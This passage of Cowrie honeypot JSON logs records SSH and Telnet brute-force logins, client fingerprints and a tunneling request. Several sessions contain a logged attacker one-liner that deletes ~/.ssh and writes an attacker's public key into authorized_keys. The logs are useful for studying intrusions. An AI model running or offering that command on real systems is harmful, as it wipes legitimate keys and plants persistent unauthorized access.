m","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T20:00:41.703833Z","src_ip":"212.227.125.160","session":"957cd3d2333c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:00:42.051769Z","src_ip":"212.227.125.160","session":"957cd3d2333c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T20:00:42.168278Z","session":"957cd3d2333c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":47016,"dst_ip":"1.2.3.4","dst_port":22,"session":"b27012802a69","protocol":"ssh","message":"New connection: 77.75.56.63:47016 (1.2.3.4:22) [session: b27012802a69]","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.319293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.320323Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.357036Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.login.success","username":"root","password":"wsxqaz123","message":"login attempt [root/wsxqaz123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.551595Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:00:45.687430Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.688266Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.689135Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.726865Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:00:45.816784Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.817478Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.855653Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.856575Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":47032,"dst_ip":"1.2.3.4","dst_port":22,"session":"1216a0384781","protocol":"ssh","message":"New connection: 77.75.56.63:47032 (1.2.3.4:22) [session: 1216a0384781]","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.890715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.891475Z","src_ip":"77.75.56.63","session":"1216a0384781"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:00:45.930526Z","src_ip":"77.75.56.63","session":"1216a0384781"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:00:46.116064Z","src_ip":"77.75.56.63","session":"1216a0384781"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.155482Z","src_ip":"77.75.56.63","session":"1216a0384781"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":47036,"dst_ip":"1.2.3.4","dst_port":22,"session":"492b5c898405","protocol":"ssh","message":"New connection: 77.75.56.63:47036 (1.2.3.4:22) [session: 492b5c898405]","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.219324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.220097Z","src_ip":"77.75.56.63","session":"492b5c898405"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.256243Z","src_ip":"77.75.56.63","session":"492b5c898405"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.441254Z","src_ip":"77.75.56.63","session":"492b5c898405"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.478270Z","src_ip":"77.75.56.63","session":"492b5c898405"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:00:47.483854Z","src_ip":"77.75.56.63","session":"b27012802a69"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":54110,"dst_ip":"1.2.3.4","dst_port":22,"session":"639540876e13","protocol":"ssh","message":"New connection: 103.206.72.2:54110 (1.2.3.4:22) [session: 639540876e13]","sensor":"my-vps","timestamp":"2025-09-08T20:01:23.687188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:23.688486Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:23.862819Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.login.success","username":"root","password":"a423512!@#","message":"login attempt [root/a423512!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:01:24.552263Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:01:24.959504Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:01:24.960302Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:01:24.961636Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.139169Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:01:25.503107Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.503894Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.683718Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.684602Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":54222,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf43e31aab53","protocol":"ssh","message":"New connection: 103.206.72.2:54222 (1.2.3.4:22) [session: bf43e31aab53]","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.876396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:25.877584Z","src_ip":"103.206.72.2","session":"bf43e31aab53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:26.063453Z","src_ip":"103.206.72.2","session":"bf43e31aab53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:01:26.800293Z","src_ip":"103.206.72.2","session":"bf43e31aab53"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:27.986788Z","src_ip":"103.206.72.2","session":"bf43e31aab53"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":54224,"dst_ip":"1.2.3.4","dst_port":22,"session":"3efdc14bc2b2","protocol":"ssh","message":"New connection: 103.206.72.2:54224 (1.2.3.4:22) [session: 3efdc14bc2b2]","sensor":"my-vps","timestamp":"2025-09-08T20:01:28.147288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:01:28.148166Z","src_ip":"103.206.72.2","session":"3efdc14bc2b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:01:28.321722Z","src_ip":"103.206.72.2","session":"3efdc14bc2b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33655,"dst_ip":"1.2.3.4","dst_port":23,"session":"34b465a8c836","protocol":"telnet","message":"New connection: 212.227.125.160:33655 (1.2.3.4:23) [session: 34b465a8c836]","sensor":"my-vps","timestamp":"2025-09-08T20:01:28.832883Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:01:29.049847Z","src_ip":"103.206.72.2","session":"3efdc14bc2b2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:29.228474Z","src_ip":"103.206.72.2","session":"3efdc14bc2b2"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:29.229551Z","src_ip":"103.206.72.2","session":"639540876e13"}
{"eventid":"cowrie.session.closed","duration":13.544713973999023,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:01:42.377496Z","src_ip":"212.227.125.160","session":"34b465a8c836"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33722,"dst_ip":"1.2.3.4","dst_port":22,"session":"f06af231d0b4","protocol":"ssh","message":"New connection: 212.227.235.229:33722 (1.2.3.4:22) [session: f06af231d0b4]","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.017923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:01:43.018950Z","src_ip":"212.227.235.229","session":"f06af231d0b4"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256",